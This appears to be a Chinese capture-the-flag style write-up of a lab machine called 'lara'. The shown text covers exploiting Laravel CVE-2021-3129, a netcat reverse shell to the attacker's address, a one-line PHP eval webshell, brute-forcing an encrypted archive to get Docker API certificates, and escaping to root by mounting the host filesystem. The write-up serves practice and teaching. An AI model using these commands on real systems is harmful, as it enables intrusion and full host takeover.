当前位置：首页 > news >正文

群友靶机lara复现 - 场

news 2026/3/26 17:16:08

lara

nmap -p- 192.168.10.13                           
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 07:21 EST
Nmap scan report for lara (192.168.10.13)
Host is up (0.00085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:33:87:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

80端口看起来没有东西，8000端口是个laravel，看起来是要打现有的poc。感觉是要去打CVE-2021-3129，但是试了几个poc都打不通。

joshuavanderpoll/CVE-2021-3129: Laravel RCE Exploit Script - CVE-2021-3129 (user-friendly with automatic log detection)这份可以打通。

直接反弹shell。

python3 poc.py --host http://192.168.10.13:8000/ --exec "busybox nc 192.168.10.11 6666 -e /bin/sh" --no-cache --force --chain laravel/rce12

发现好像提升不了稳定shell，看了一眼根目录发现.dockerenv，应该是docker环境了。不知道咋下手，没有学过docker逃逸。然后发现可以直接在/var/www/html下写马。直接往80端口下写马。

echo '<?php @eval($_POST["cmd"]);?>' > z.php
cat z.php
<?php @eval($_POST["cmd"]);?>

蚁剑连接拿下uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)权限。

注意到alice用户下发现openssl enc -aes-256-cbc -in certs.tar.gz -out tar.gz.enc -iter 10000 -pbkdf2还有一个.enc文件。

蚁剑下载不下来，直接xxd -p .enc然后from hex搞下来

让ai写个爆破脚本解密一下，密码060606拿到certs，是docker api凭证。socat把流量转发出来。./socat TCP-LISTEN:1234,fork,bind=0.0.0.0 TCP:127.0.0.1:2376

docker --tls \--tlscacert=ca.pem \--tlscert=client-cert.pem \--tlskey=client-key.pem \-H=tcp://192.168.10.13:1234 \version
Client:Version:           27.5.1+dfsg4API version:       1.47Go version:        go1.24.9Git commit:        cab968b3Built:             Thu Nov  6 10:43:49 2025OS/Arch:           linux/amd64Context:           defaultServer:Engine:Version:          28.3.3API version:      1.51 (minimum version 1.24)Go version:       go1.24.11Git commit:       bea959c7b793b32a893820b97c4eadc7c87fabb0Built:            Tue Dec  2 23:05:51 2025OS/Arch:          linux/amd64Experimental:     falsecontainerd:Version:          v2.1.5GitCommit:        fcd43222d6b07379a4be9786bda52438f0dd16a1runc:Version:          1.3.4GitCommit:        d842d7719497cc3b774fd71620278ac9e17710e0docker-init:Version:          0.19.0GitCommit:

提权

docker --tls \--tlscacert=ca.pem \--tlscert=client-cert.pem \--tlskey=client-key.pem \-H=tcp://192.168.10.13:1234 \images 
REPOSITORY     TAG       IMAGE ID       CREATED       SIZE
laravel-vuln   latest    aaf7bbe495b7   3 weeks ago   141MB
#直接拿现成的镜像用
docker --tls \--tlscacert=ca.pem \--tlscert=client-cert.pem \--tlskey=client-key.pem \-H=tcp://192.168.10.13:1234 \run -v /:/mnt --rm -it laravel-vuln chroot /mnt /bin/sh
/ # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cat /root/root.txt
flag{root-ede49d353365dfcf95b6bf8df1b7a2dc}

至此提权成功。

查看全文

http://www.jsqmd.com/news/269742/